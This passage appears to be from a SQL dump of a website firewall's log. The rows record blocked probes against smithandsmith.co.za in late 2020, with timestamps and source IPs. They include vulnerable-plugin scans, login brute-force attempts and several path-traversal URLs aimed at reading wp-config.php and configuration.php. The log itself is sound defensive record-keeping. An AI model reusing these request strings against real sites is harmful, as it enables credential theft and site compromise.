04:14:25','69.10.58.29','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2363,'2020-09-28 07:48:56','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2364,'2020-09-28 16:23:18','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2365,'2020-09-28 16:23:57','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2366,'2020-09-28 16:24:20','193.239.147.35','http://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2367,'2020-09-28 16:24:39','193.239.147.35','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2368,'2020-09-29 01:20:19','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/','404shield',''),(2369,'2020-09-29 09:47:23','52.191.189.177','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2370,'2020-09-30 00:19:30','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2371,'2020-09-30 06:59:59','13.90.25.234','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2372,'2020-09-30 07:00:41','13.90.25.234','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2373,'2020-09-30 07:01:10','13.90.25.234','https://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2374,'2020-09-30 07:01:41','13.90.25.234','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2375,'2020-09-30 15:51:06','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/piccione-theme/style.css','404shield',''),(2376,'2020-10-01 08:48:48','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/project10-theme/style.css','404shield',''),(2377,'2020-10-01 13:59:34','45.146.165.166','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2378,'2020-10-01 17:37:41','5.128.233.182','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2379,'2020-10-02 03:18:22','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/radial-theme/style.css','404shield',''),(2380,'2020-10-03 02:19:03','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/files/','404shield',''),(2381,'2020-10-03 03:07:15','45.146.165.166','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2382,'2020-10-03 05:05:04','188.116.151.100','http://smithandsmith.co.za/wp-login.php','404shield',''),(2383,'2020-10-03 05:05:06','188.116.151.100','http://smithandsmith.co.za/administrator/','adminpw',''),(2384,'2020-10-03 18:52:44','13.90.25.234','http://www.smithandsmith.co.za/wp-content/plugins/formcraft/file-upload/server/php/files/199877.php','404shield',''),(2385,'2020-10-03 18:53:29','13.90.25.234','http://www.smithandsmith.co.za/wp-content/x.php','404shield',''),(2386,'2020-10-03 18:53:51','13.90.25.234','http://www.smithandsmith.co.za/wp-content/plugins/wp-mobile-detector/cache/king.php','404shield',''),(2387,'2020-10-03 18:53:56','13.90.25.234','http://www.smithandsmith.co.za/wp-content/plugins/downloads-manager/img/unlock.gif','404shield',''),(2388,'2020-10-04 02:09:31','23.228.109.146','http://smithandsmith.co.za/wp-content/plugins/business-directory-plugin/vendors/jQuery-File-Upload/server/php/index.php','404shield',''),(2389,'2020-10-04 10:43:24','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/rayoflight-theme/css/style.css','404shield',''),(2390,'2020-10-05 03:41:57','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/reganto-theme/style.css','404shield',''),(2391,'2020-10-05 17:39:44','31.202.101.40','http://smithandsmith.co.za/wp-login.php','404shield',''),(2392,'2020-10-06 02:27:22','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/rockstar-theme/style.css','404shield',''),(2393,'2020-10-06 02:50:10','5.128.45.199','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2394,'2020-10-07 06:04:11','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/sportimo-theme/style.css','404shield',''),(2395,'2020-10-07 08:25:46','193.239.147.59','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2396,'2020-10-07 08:28:53','193.239.147.59','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2397,'2020-10-07 08:50:22','193.239.147.59','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2398,'2020-10-07 08:50:40','193.239.147.59','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2399,'2020-10-07 08:50:47','193.239.147.59','http://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2400,'2020-10-07 12:12:24','193.239.147.59','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2401,'2020-10-07 12:12:44','193.239.147.59','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2402,'2020-10-07 12:13:05','193.239.147.59','http://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2403,'2020-10-07 12:39:53','193.239.147.59','http://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2404,'2020-10-07 12:41:31','193.239.147.59','http://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2405,'2020-10-08 05:16:11','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/anthology/style.css','404shield',''),(2406,'2020-10-09 05:08:46','23.228.109.146','http://smithandsmith.co.za/wp-content/themes/Anthology/style.css','404shield',''),(2407,'2020-10-12 12:31:28','74.208.235.136','https://smithandsmith.co.za/wp-login.php','404shield',''),(2408,'2020-10-12 21:39:45','95.65.1.93','https://smithandsmith.co.za/wp-login.php','404shield',''),(2409,'2020-10-12 21:39:54','95.65.1.93','https://smithandsmith.co.za/wp-login.php','404shield',''),(2410,'2020-10-13 02:22:21','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/curvo/style.css','404shield',''),(2411,'2020-10-13 15:26:14','14.192.248.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(2412,'2020-10-13 15:26:30','14.192.248.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(2413,'2020-10-13 15:27:01','14.192.248.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(2414,'2020-10-14 02:09:35','23.228.109.146','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2415,'2020-10-14 04:52:50','188.116.151.100','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2416,'2020-10-14 05:14:36','5.128.233.182','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2417,'2020-10-14 18:41:37','78.4.54.14','https://smithandsmith.co.za/wp-login.php','404shield',''),(2418,'2020-10-14 18:41:39','78.4.54.14','https://smithandsmith.co.za/wp-login.php','404shield',''),(2419,'2020-10-14 18:41:45','78.4.54.14','https://smithandsmith.co.za/wp-login.php','404shield',''),(2420,'2020-10-14 21:21:42','87.95.133.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(2421,'2020-10-14 21:21:45','87.95.133.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(2422,'2020-10-14 21:21:48','87.95.133.197','https://smithandsmith.co.za/wp-login.php','404shield',''),(2423,'2020-10-15 00:25:32','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/dandelion/style.css','404shield',''),(2424,'2020-10-15 07:38:24','91.190.180.62','https://smithandsmith.co.za/wp-login.php','404shield',''),(2425,'2020-10-15 07:38:27','91.190.180.62','https://smithandsmith.co.za/wp-login.php','404shield',''),(2426,'2020-10-15 07:38:31','91.190.180.62','https://smithandsmith.co.za/wp-login.php','404shield',''),(2427,'2020-10-15 09:15:55','146.66.19.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(2428,'2020-10-15 09:16:01','146.66.19.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(2429,'2020-10-15 09:16:05','146.66.19.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(2430,'2020-10-15 09:21:38','5.128.233.182','https://smithandsmith.co.za/','sessionshield',''),(2431,'2020-10-15 16:15:59','91.121.183.89','https://smithandsmith.co.za/wp-login.php','404shield',''),(2432,'2020-10-15 16:17:31','91.121.183.89','https://smithandsmith.co.za/wp-login.php','404shield',''),(2433,'2020-10-15 16:17:55','91.121.183.89','https://smithandsmith.co.za/wp-login.php','404shield',''),(2434,'2020-10-15 18:22:08','188.244.26.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(2435,'2020-10-15 18:22:11','188.244.26.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(2436,'2020-10-15 18:22:13','188.244.26.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(2437,'2020-10-15 21:26:16','193.239.147.178','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2438,'2020-10-15 21:27:05','193.239.147.178','https://smithandsmith.co.za/wp-login.php','404shield',''),(2439,'2020-10-15 21:27:20','193.239.147.178','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2440,'2020-10-15 23:33:42','193.239.147.178','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2441,'2020-10-15 23:33:51','193.239.147.178','https://smithandsmith.co.za/wp-login.php','404shield',''),(2442,'2020-10-15 23:35:03','193.239.147.178','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2443,'2020-10-16 03:02:19','23.228.109.146','https://smithandsmith.co.za/wp-admin/sk.php','404shield',''),(2444,'2020-10-16 12:00:28','193.239.147.178','http://smithandsmith.co.za/','muashield',''),(2445,'2020-10-16 12:00:29','193.239.147.178','http://smithandsmith.co.za/','muashield',''),(2446,'2020-10-16 12:00:33','193.239.147.178','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2447,'2020-10-16 13:03:13','95.153.97.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2448,'2020-10-16 13:03:15','95.153.97.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2449,'2020-10-16 13:03:18','95.153.97.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(2450,'2020-10-16 18:50:59','77.235.107.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(2451,'2020-10-16 18:51:02','77.235.107.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(2452,'2020-10-16 18:51:04','77.235.107.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(2453,'2020-10-17 00:49:16','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/Dandelion/style.css','404shield',''),(2454,'2020-10-17 00:51:42','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/dimension/style.css','404shield',''),(2455,'2020-10-17 08:23:54','163.172.42.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(2456,'2020-10-17 14:25:59','164.132.48.179','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2457,'2020-10-17 23:36:59','37.23.223.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(2458,'2020-10-17 23:37:10','37.23.223.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(2459,'2020-10-17 23:37:32','37.23.223.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(2460,'2020-10-18 07:56:48','185.152.123.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(2461,'2020-10-18 07:56:52','185.152.123.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(2462,'2020-10-18 07:56:55','185.152.123.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(2463,'2020-10-18 12:26:15','52.188.50.120','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2464,'2020-10-18 12:31:28','52.188.50.120','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2465,'2020-10-18 18:25:14','77.235.107.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(2466,'2020-10-18 18:25:17','77.235.107.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(2467,'2020-10-18 18:25:20','77.235.107.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(2468,'2020-10-18 23:02:21','159.89.50.148','https://smithandsmith.co.za/wp-login.php','404shield',''),(2469,'2020-10-18 23:02:21','159.89.50.148','https://smithandsmith.co.za/wp-login.php','404shield',''),(2470,'2020-10-19 02:44:56','77.235.100.180','https://smithandsmith.co.za/wp-login.php','404shield',''),(2471,'2020-10-19 02:44:59','77.235.100.180','https://smithandsmith.co.za/wp-login.php','404shield',''),(2472,'2020-10-19 02:45:01','77.235.100.180','https://smithandsmith.co.za/wp-login.php','404shield',''),(2473,'2020-10-19 02:50:58','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/highlight/style.css','404shield',''),(2474,'2020-10-19 09:10:09','207.244.247.29','https://smithandsmith.co.za/wp-login.php','404shield',''),(2475,'2020-10-19 17:30:47','45.140.173.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(2476,'2020-10-20 02:49:25','5.129.69.11','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2477,'2020-10-20 06:08:48','91.219.58.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(2478,'2020-10-20 06:08:51','91.219.58.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(2479,'2020-10-20 06:08:54','91.219.58.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(2480,'2020-10-20 07:21:23','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/OptimizePress/lib/admin/media-upload.php','404shield',''),(2481,'2020-10-20 08:47:03','178.165.70.181','http://smithandsmith.co.za/administrator/','adminpw',''),(2482,'2020-10-20 10:52:11','178.165.70.181','http://smithandsmith.co.za/administrator/','adminpw',''),(2483,'2020-10-20 13:24:10','95.153.88.85','https://smithandsmith.co.za/wp-login.php','404shield',''),(2484,'2020-10-20 13:24:12','95.153.88.85','https://smithandsmith.co.za/wp-login.php','404shield',''),(2485,'2020-10-20 13:24:15','95.153.88.85','https://smithandsmith.co.za/wp-login.php','404shield',''),(2486,'2020-10-20 15:38:12','5.62.41.171','https://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2487,'2020-10-20 15:39:09','5.62.41.171','http://www.smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2488,'2020-10-20 15:40:42','5.62.41.171','https://www.smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2489,'2020-10-21 01:56:33','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/optimizepress/lib/admin/media-upload.php','404shield',''),(2490,'2020-10-21 07:23:08','45.128.124.48','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2491,'2020-10-21 07:23:15','45.128.124.48','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2492,'2020-10-21 19:56:56','82.127.135.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(2493,'2020-10-21 19:57:01','82.127.135.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(2494,'2020-10-21 19:57:11','82.127.135.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(2495,'2020-10-22 01:12:43','20.185.16.146','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2496,'2020-10-22 01:13:04','20.185.16.146','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2497,'2020-10-22 01:14:00','20.185.16.146','https://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2498,'2020-10-22 02:15:00','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/konzept/includes/uploadify/upload.php','404shield',''),(2499,'2020-10-22 02:20:25','20.185.16.146','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2500,'2020-10-22 23:46:54','37.204.108.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(2501,'2020-10-22 23:46:58','37.204.108.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(2502,'2020-10-22 23:47:00','37.204.108.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(2503,'2020-10-23 02:25:27','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/konzept/style.css','404shield',''),(2504,'2020-10-23 13:02:24','34.69.88.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(2505,'2020-10-23 23:40:36','194.61.24.94','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/readme.txt','404shield',''),(2506,'2020-10-24 01:23:31','173.212.244.135','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2507,'2020-10-24 11:41:12','176.113.227.121','https://smithandsmith.co.za/wp-login.php','404shield',''),(2508,'2020-10-24 11:41:16','176.113.227.121','https://smithandsmith.co.za/wp-login.php','404shield',''),(2509,'2020-10-24 11:41:21','176.113.227.121','https://smithandsmith.co.za/wp-login.php','404shield',''),(2510,'2020-10-24 17:17:41','178.170.249.30','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2511,'2020-10-25 02:04:36','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/Famous/style.css','404shield',''),(2512,'2020-10-25 05:02:18','91.134.248.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(2513,'2020-10-25 06:49:13','37.232.186.185','https://smithandsmith.co.za/wp-login.php','404shield',''),(2514,'2020-10-25 06:49:16','37.232.186.185','https://smithandsmith.co.za/wp-login.php','404shield',''),(2515,'2020-10-25 06:49:19','37.232.186.185','https://smithandsmith.co.za/wp-login.php','404shield',''),(2516,'2020-10-25 11:20:35','5.128.233.182','https://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2517,'2020-10-26 00:43:34','13.70.199.80','https://smithandsmith.co.za/wp-login.php','404shield',''),(2518,'2020-10-26 02:33:57','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/famous/style.css','404shield',''),(2519,'2020-10-26 04:19:00','104.214.79.46','https://smithandsmith.co.za/wp-content/plugins/apikey/apikey.php','404shield',''),(2520,'2020-10-26 04:19:27','104.214.79.46','https://smithandsmith.co.za/wp-content/plugins/apikey/cursed.php','404shield',''),(2521,'2020-10-26 20:02:24','104.214.79.46','https://www.smithandsmith.co.za/wp-content/plugins/apikey/apikey.php','404shield',''),(2522,'2020-10-26 20:02:49','104.214.79.46','https://www.smithandsmith.co.za/wp-content/plugins/apikey/cursed.php','404shield',''),(2523,'2020-10-27 01:49:46','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/deep-blue/style.css','404shield',''),(2524,'2020-10-27 04:40:37','205.204.73.33','https://smithandsmith.co.za/wp-login.php','404shield',''),(2525,'2020-10-27 06:13:54','134.209.67.45','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2526,'2020-10-27 14:04:34','14.161.20.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2527,'2020-10-27 14:05:12','14.161.20.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2528,'2020-10-27 14:05:36','14.161.20.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2529,'2020-10-27 14:20:26','95.174.110.235','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2530,'2020-10-27 17:19:24','202.169.110.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(2531,'2020-10-27 17:19:31','202.169.110.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(2532,'2020-10-27 17:19:53','202.169.110.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(2533,'2020-10-27 18:33:08','115.84.92.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(2534,'2020-10-27 18:33:18','115.84.92.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(2535,'2020-10-27 18:33:51','115.84.92.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(2536,'2020-10-28 01:44:29','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/kiddo/style.css','404shield',''),(2537,'2020-10-29 02:24:47','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/clockstone/style.css','404shield',''),(2538,'2020-10-29 15:12:15','51.195.201.76','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(2539,'2020-10-29 15:12:16','51.195.201.76','https://smithandsmith.co.za/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php','404shield',''),(2540,'2020-10-29 15:12:16','51.195.201.76','https://smithandsmith.co.za/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php','404shield',''),(2541,'2020-10-29 18:39:01','91.185.190.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(2542,'2020-10-30 00:59:53','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/famous/megaframe/megapanel/inc/functions.php','404shield',''),(2543,'2020-10-30 06:41:28','185.81.157.12','https://smithandsmith.co.za//wp-admin/install.php','404shield',''),(2544,'2020-10-30 17:18:19','95.153.81.158','https://smithandsmith.co.za/wp-login.php','404shield',''),(2545,'2020-10-30 17:18:23','95.153.81.158','https://smithandsmith.co.za/wp-login.php','404shield',''),(2546,'2020-10-30 17:18:25','95.153.81.158','https://smithandsmith.co.za/wp-login.php','404shield',''),(2547,'2020-10-30 17:35:34','104.214.79.46','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2548,'2020-10-30 22:58:28','89.218.172.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(2549,'2020-10-30 22:58:33','89.218.172.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(2550,'2020-10-30 22:58:41','89.218.172.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(2551,'2020-10-30 23:19:59','187.188.132.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(2552,'2020-10-30 23:20:05','187.188.132.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(2553,'2020-10-30 23:20:09','187.188.132.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(2554,'2020-10-31 02:21:40','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/Clockstone/style.css','404shield',''),(2555,'2020-10-31 11:05:15','31.186.8.90','https://smithandsmith.co.za/wp-login.php','404shield',''),(2556,'2020-11-01 00:43:30','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php','404shield',''),(2557,'2020-11-01 17:39:50','165.227.201.25','https://smithandsmith.co.za/wp-login.php','404shield',''),(2558,'2020-11-01 17:39:50','165.227.201.25','https://smithandsmith.co.za/wp-login.php','404shield',''),(2559,'2020-11-02 02:32:25','45.147.197.216','http://smithandsmith.co.za/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php','dfishield',''),(2560,'2020-11-02 02:32:29','45.147.197.216','http://smithandsmith.co.za/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=../../../../configuration.php&order=name&srt=yes','dfishield',''),(2561,'2020-11-02 02:32:30','45.147.197.216','http://smithandsmith.co.za/plugins/content/fsave/download.php?filename=../../../configuration.php','dfishield',''),(2562,'2020-11-02 05:49:18','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','404shield',''),(2563,'2020-11-02 06:45:34','185.81.157.12','https://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(2564,'2020-11-02 06:46:03','185.81.157.12','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(2565,'2020-11-02 19:04:51','95.153.88.85','https://smithandsmith.co.za/wp-login.php','404shield',''),(2566,'2020-11-02 19:04:53','95.153.88.85','https://smithandsmith.co.za/wp-login.php','404shield',''),(2567,'2020-11-02 19:04:56','95.153.88.85','https://smithandsmith.co.za/wp-login.php','404shield',''),(2568,'2020-11-02 19:45:30','185.81.157.12','https://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(2569,'2020-11-03 01:00:46','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/cameleonthemeforest/includes/fileuploader/upload_handler.php','404shield',''),(2570,'2020-11-03 03:43:09','104.214.79.46','https://smithandsmith.co.za/wp-content/plugins/simple-file-list/ee-upload-engine.php','404shield',''),(2571,'2020-11-03 03:43:27','104.214.79.46','https://smithandsmith.co.za/wp-content/uploads/simple-file-list/bcejmaipiq.png','404shield',''),(2572,'2020-11-03 11:33:19','104.214.79.46','https://www.smithandsmith.co.za/wp-content/plugins/simple-file-list/ee-upload-engine.php','404shield',''),(2573,'2020-11-03 11:33:25','104.214.79.46','https://www.smithandsmith.co.za/wp-content/uploads/simple-file-list/lzcxckcqqk.png','404shield',''),(2574,'2020-11-03 14:24:51','192.95.30.137','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2575,'2020-11-04 11:49:16','186.179.100.134','https://smithandsmith.co.za/wp-login.php','404shield',''),(2576,'2020-11-04 11:49:21','186.179.100.134','https://smithandsmith.co.za/wp-login.php','404shield',''),(2577,'2020-11-04 11:49:26','186.179.100.134','https://smithandsmith.co.za/wp-login.php','404shield',''),(2578,'2020-11-05 01:56:56','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php','404shield',''),(2579,'2020-11-05 02:22:47','193.239.147.186','https://www.smithandsmith.co.za/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2580,'2020-11-05 02:22:49','193.239.147.186','https://www.smithandsmith.co.za/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2581,'2020-11-05 02:23:08','193.239.147.186','https://www.smithandsmith.co.za/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2582,'2020-11-05 04:04:20','14.161.20.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2583,'2020-11-05 04:04:47','14.161.20.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2584,'2020-11-05 04:04:56','14.161.20.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2585,'2020-11-05 05:53:33','193.239.147.186','https://smithandsmith.co.za/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2586,'2020-11-05 05:53:35','193.239.147.186','https://smithandsmith.co.za/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2587,'2020-11-05 05:54:31','193.239.147.186','https://smithandsmith.co.za/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','404shield',''),(2588,'2020-11-05 20:45:41','62.210.107.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(2589,'2020-11-05 22:53:57','31.36.100.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2590,'2020-11-05 22:54:00','31.36.100.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2591,'2020-11-05 22:54:04','31.36.100.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(2592,'2020-11-06 00:23:17','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/eptonic-v1.4.3/functions/jwpanel/scripts/valums_uploader/php.php','404shield',''),(2593,'2020-11-06 05:09:57','138.68.67.6','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(2594,'2020-11-06 09:28:08','113.161.88.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(2595,'2020-11-06 09:28:14','113.161.88.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(2596,'2020-11-06 09:28:20','113.161.88.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(2597,'2020-11-06 23:59:00','104.210.214.37','https://smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2598,'2020-11-07 00:00:11','104.210.214.37','https://www.smithandsmith.co.za/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','404shield',''),(2599,'2020-11-07 00:41:29','104.210.214.37','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(2600,'2020-11-07 00:41:42','104.210.214.37','http://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','dfishield',''),(2601,'2020-11-07 00:41:57','104.210.214.37','https://smithandsmith.co.za/wp-content/index.php?x=ooo','404shield',''),(2602,'2020-11-07 01:40:39','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php','404shield',''),(2603,'2020-11-07 15:25:42','165.22.216.122','https://smithandsmith.co.za/wp-login.php','404shield',''),(2604,'2020-11-08 05:46:55','93.170.124.208','http://smithandsmith.co.za/','muashield',''),(2605,'2020-11-08 09:56:30','23.228.109.146','https://smithandsmith.co.za/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php','404shield',''),(2606,'2020-11-08 16:08:56','202.137.155.95','https://smithandsmith.co.za/wp-login.php','404shield',''),(2607,'2020-11-08 16:11:24','202.137.155.95','https://smithandsmith.co.za/wp-login.php','404shield',''),(2608,'2020-11-08 16:11:57','202.137.155.95','https://smithandsmith.co.za/wp-login.php','404shield',''),(2609,'2020-11-08 16:14:58','137.117.102.110','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2610,'2020-11-08 